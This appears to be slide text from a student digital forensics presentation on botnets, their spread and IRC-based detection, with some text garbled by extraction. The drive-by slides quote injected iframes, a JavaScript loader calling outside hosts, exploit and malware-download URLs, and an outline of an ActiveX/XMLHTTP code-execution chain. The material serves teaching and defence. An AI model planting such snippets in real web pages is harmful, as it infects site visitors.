BOTS and MALWARE

by Amy Farina

“Internet malware attacks have evolved into better organized and

more profit-centered endeavors. Email spam, extortion
through denial-of-service attacks and click fraud represent
a few examples of this emerging trend.
Botnets are a root cause of these problems.”
– Wang, Sparks, Zou: An Advanced Hybrid Peer-to-Peer Botnet
 Presentation to cover:

1.
1. What
What are
arebots,
bots,botnets,
botnets, botmasters/herders,
botmasters/herders, etc?
etc?

2.
2. How
Howcan
canthey
theybe
bedetected?
detected?

3.
3. How
Howthey
theyhave
haveevolved
evolved over
over time
time

4.
4.Conclusion
Conclusion
 What is a bot / botnet?
• A bot is a term used to describe an
automated ‘robot’ process but is also
commonly used to describe a
compromised host (aka, zombie, drone)
• A botnet is a network of compromised
computers controlled by a botmaster/
botherder/controller. Bot armies can be
hundreds to thousands of compromised
machines
 Background Info/Definitions
• Host control mechanisms

• Traditional propagation

• Traditional methods of detection

• Evolution of bots to HTTP and P2P, most

still use IRC - proposed hybrids using both
IRC/P2P or HTTP alone for future bots
 What is a bot / botnet?
• A botnet requires a server to act as a command
and control center (C&C)
• Two different IRC servers software
implementation are commonly used to run a
botnet: Unreal IRCd and ConferenceRoom:
• Most botnets that have appeared in the past
have used a centralized architecture, bots
connect directly via IRC channels to a C&C
server, usually there are several C&C servers.
• Besides IRC more and more bots are using
other protocols such as HTTP as a
communication channel (P2P “superbot”).
Architecture of a botnet
 Advanced Hybrid Peer-to-peer
Practical challenges faced by botmasters:
• How to generate a robust botnet capable of maintaining control of its
remaining bots even after a substantial portion of the botnet
population has been removed by defenders?

• How to prevent significant exposure of the network topology when

some bots are captured by defenders?

• How to easily monitor and obtain the complete information of a

botnet by its botmaster?

• How to prevent (or make it harder) defenders from detecting bots

viatheir communication traffic patterns?

• In addition, the design should also consider many network related

issues such as dynamic or private IP addresses and the diurnal
online/offline property of bots
 New Botnets - Hybrids
• No bootstrap process
• Communicates via peer list but does not
reveal it to other bots
• Report command – chgs IP address each
time
• Update command – updates peer list
• Only static global IPs for servant bots
• Servant bot listens on determined service
port using encryption
 How do they get there?

EXPLOITS DOWNLOADS DRIVE-BYs 3rd PARTY

EXAMPLES: EXAMPLES: EXAMPLES: EXAMPLES:

LSASS (TCP Free games iframes, Software 3rd

445) install javascript party –indirect
weak NetBios keyloggers, attacks vulner-
(TCP 139,137) sniffers, heavily used abilities, web
• RPC (TCP 135, backdoors, 2006, 2007
start proxy server com-
4445, 1025) promises, web
servers, etc.
Direct attacks (social templates,
used heavily in engineering) advertising
2004, 2005
 BOTS: Agobot (PCWorld ranked ‘best bot’)
Agobot’s evolution has included an ever broadening set of
exploits instead of individual versions with their own exploits.
The exploits in the version of Agobot that we evaluated
include:

• Bagle scanner: scans for back doors left by Bagle variants on port 2745.
• Dcom scanners (1/2): scans for the well known DCE-RPC buffer
overflow.
• MyDoom scanner: scans for back doors left by variants of the MyDoom
worm on port 3127.
• Dameware scanner: scans for vulnerable versions of the Dameware
network administration tool.
• NetBIOS scanner: brute force password scanning for open NetBIOS
shares.
• Radmin scanner: scans for the Radmin buffer overflow.
• MS-SQL scanner: brute force password scanning for open SQL servers.
• Generic DDoS module: enables seven types of denial service attack
against a targeted host
 IRC BOTS: sdbot, spybot, gtbot
• SDBot does not have any exploits packaged in
its standard distribution. There are, however,
numerous variants that include specific exploits.
• Spybot only includes attacks on NetBIOS open
shares. However, as with SDBot, there are many
variants that include a wide range of exploits.
• The exploit set for the GTBot code was
developed to include RPC-DCOM exploits. Like
SDBot and Spybot, there are many variants of
GT Bot that include other well known exploits.
 How to detect IRC bots?
• If use of a standardized protocol like IRC is used then
detection can be easier.

[nick collusions: IETF – 1459 specification for IRC]

If a NICK message arrives at a server which
already knows about an identical nickname for
another client, a nickname collision occurs. As
a result of a nickname collision, all instances of
the nickname are removed from the server's
database, and a KILL command is issued to remove
the nickname from all other server's database. If
the NICK message causing the collision was a
nickname change, then the original (old) nick must
be removed as well. If the server receives an
identical NICK from a client which is directly
connected, it may issue an ERR_NICKCOLLISION to
the local client, drop the NICK command, and not
generate any kills.
 Example of IRC bot detection
Rishi: Identify Bot Contaminated Hosts by IRC
Nickname Evaluation – proof of concept
• techniques are mainly based on passively
monitoring network traffic for unusual or
suspicious IRC nicknames, IRC servers, and
uncommon server ports.
• using n-gram analysis and a scoring system,
detect bots that use uncommon communication
channels, which are commonly not detected by
classical intrusion detection systems.
• statistics like mean packet length of IRC packets
and the distribution of IRC messages like JOIN
or PING/PONG
 Need for unique NICK
• RBOT|XP|48124
• # ngrep [...] ’JOIN$|$NICK$|$MODE$| \
$USER$|$QUIT’ ’tcp[((tcp[12:1] \
\& 0xf0) $>>$ 2):4] = 0x4e49434b \
• For each IRC connection a connection object is
created, which stores the above mentioned
information, plus an additional identifier ˆ\[[0-9]
{1,2}\|[A-Z]{2,3}\|[0-9]{4,}\]$ which matches
common bot nicknames like 00|DEU|597660],
[03|USA|147700] or [0|KOR|43724]
 Rishi not completely effective
“…an incident from December 2006. During that time we
observed that Rishi logged several channel joins to
an IRC server on port 54932, without any further
information like nickname or user mode.
Fortunately, we could extract the destination IP
address from the Rishi log files. We started a
separated packet capture instance to analyse
network traffic to and from the suspicious IRC
server. As a result, we noticed that the bot
utilized its own IRC protocol by changing a few
basic commands to customized ones. The command NICK
was changed to SENDN, USER was changed to SENDU,
and PRIVMSG was changed to SENDM. So in this case
we were lucky as the bot missed to also change the
JOIN command which triggered our botnet detection
software. In the case where all IRC commands are
customized, there is almost no chance for Rishi to
detect an infected host at this time, as it is the
case with many signature based detection
mechanisms.”
Ports used
Geographical dist of C&Cs
 New Bots – HTTP / P2P
• Detecting these new bots
• Drive-by infections
• Google presentation at hotbot - The Ghost
In The Browser: Analysis of Web-based
Malware
• Honeymonkeys
• Create repository of web pages attempting
to exploit web browsers
• Started in March 2006 for 12 months
 Web-based Malware detection

Malware & Botnets

Advertising

4 Main
Web Server
Security
Browser Third-Party
Exploits Widgets

User
contributed
content
 Their purpose and findings
• How does malware take advantage of
browser vulnerabilities & install binaries on
users’ computers?

• Distribution of these binaries and evolution

of new botnets?

• Determine the extent of these new botnets

and how they are formed – like hybrids
 Methods and findings
• IE in a virtual machine and navigate to
URLs in repository of bad sites
• Record all HTTP fetches, state changes,
new processes started, registry and file
system changes
• Analyzed content of several billion URLs,
indepth analysis on 4.5 billion, from that
450,000 were successfully launching
drive-by downloads (another 700,000
malicious but had lower confidence)
 Drive-by Infection Vectors
WebServer security:

<!-- Copyright Information -->

<div align=’center’ class=’copyright’>Powered by
<a href="http://www.invisionboard.com">Invision Power
Board</a>(U)
v1.3.1 Final &copy; 2003 &nbsp;
<a href=’http://www.invisionpower.com’>IPS, Inc.</a></div>
</div>
<iframe src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’>
</iframe>
<iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?
adv=193’> </iframe>
 Drive-by Infection Vectors
User contributed content:
– If the inserted HTML contains an exploit, all
visitors of the posts or profile pages are
exposed to the attack.
– Example was a site that allowed users to
create their own online polls, javascript
redirected a user to a malicious site
(location.replace(‘http://videozfree.com’;)
which used social engineering and exploit
code to infect visitors.
 Drive-by Infection Vectors
Advertising:
In December 2006, via several hops using sub-
syndication, the iframe got redirected to a
Russian company which served up encrypted
javascript that attempted multiple exploits
against the browser and resulted in the
installation of several malware binaries on the
user’s computer.
 Drive-by Infection Vectors
Third Party Widgets:
Example:
<!-- Begin Stat Basic code -->
<script language="JavaScript"
src="http://m1.stat.xx/basic.js">
</script><script language="JavaScript">
<!--
statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);
// -->
</script> <noscript>
<a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA">
<img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA"
border="0" nosave width="18" height="18"></a></noscript>
 …changed in 2006 to:
Started to exploit every user visiting pages linked to the counter. Now
malicious JavaScript first records the presence of the following external
systems: Shockwave Flash, Shockwave for Director, RealPlayer,
QuickTime, VivoActive, LiveAudio, VRML, Dynamic HTML Binding,
Windows Media Services. It then outputs another piece of JavaScript to the
main page:
d.write("<scr"+"ipt language=’JavaScript’
type=’text/javascript’
src=’http://m1.stats4u.yy/md.js?country=us&id="+ id +
"&_t="+(new Date()).getTime()+"’></scr"+"ipt>")
This in turn triggers another wave of implicit downloads finally resulting in exploit code.
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe
 Malware and botnets
• Malware binaries are connected to compromised
sites and their corresponding binary distribution
URLs.
• The main difference between web-based
malware and traditional botnets is a looser
feedback loop for the command and control
network.
• Unlike traditional botnet, web-based malware is
pull based and more difficult to track. Finding all
the webbased infection vectors is a significant
challenge and requires almost complete
knowledge of the web as a whole.
 New Exploiting Mechanisms
• proliferation of technologies such as NATs
and Firewalls make it difficult to remotely
connect and exploit services running on
users’ computers – this forced attackers to
discover other avenues of exploitation
• increased capabilities of web browsers
and their ability to execute code internally
or launch external programs make web
servers an attractive target for exploitation
 Remote code execution
A twenty line Javascript can accomplish this
sequence of steps to launch any binary on a
vulnerable installation:
• The exploit is delivered to a user’s browser via an iframe
on a compromised web page.
• The iframe contains Javascript to instantiate an ActiveX
object that is not normally safe for scripting.
• The Javascript makes an XMLHTTP request to retrieve
an executable.
• Adodb.stream is used to write the executable to disk.
• A Shell.Application is used to launch the newly written
executable.
 Conclusion
• Primary goals of botnets:
– information dispersion (Spam, DDoS)
– information harvesting (ID theft, password, financial
data theft)
– Information processing (cracking password stored as
MD5 hash, CD Keys)
• Today many botnets use IRC as a form of C&C
and are most easily detected, large code base
for hackers, redundancy, scalability & versatility
(ex: agobot)
• Goal to develop methods for detection,
mitigation, and prevention
 Botnet methods for exploits

Botnet Exploits

IRC P2P HTTP Hybrids

 SDBot - Lab
• Simulate botnet controller using IRC to
control infected machines via IRC
• Redhat Workstation VM 4.0 host IRC and
malicious bot controller
• WinXP VM configured to connect to the
IRC daemon running on RedHat
• Implementation instructions via
Botnet3.doc
 Code, packets, honeypots
• C++ code – Sdbot v0.5b & Agobot
• Captured ethereal network analysis of a
compromised host using DNS and HTTP
for transfer of encrypted payload
• HTTP floods
• GenII Honeynets – KYE, Tracking Botnets
– March 2005 Paper
– Honeynet Project great source for getting info
 March 2005 Honeynet findings
Almost all bots used resource sharing but often these vulnerability-specific
ports:

• 42 - WINS (Host Name Server)

• 80 - www (vulnerabilities in Internet Information Server 4 / 5 or Apache)
• 903 - NetDevil Backdoor
• 1025 - Microsoft Remote Procedure Call (RPC) service and Windows
Messenger port
• 1433 - ms-sql-s (Microsoft-SQL-Server)
• 2745 - backdoor of Bagle worm (mass-mailing worm)
• 3127 - backdoor of MyDoom worm (mass-mailing worm)
• 3306 - MySQL UDF Weakness
• 3410 - vulnerability in Optix Pro remote access trojan (Optix Backdoor)
• 5000 - upnp (Universal Plug and Play: MS01-059 - Unchecked Buffer in
Universal Plug and Play can Lead to System Compromise)
• 6129 - dameware (Dameware Remote Admin - DameWare Mini Remote
Control Client Agent Service Pre-Authentication Buffer Overflow
Vulnerability)
Comments and Questions

NJIT: IT-485
Digital Forensics

Professor: Det. Denman Powers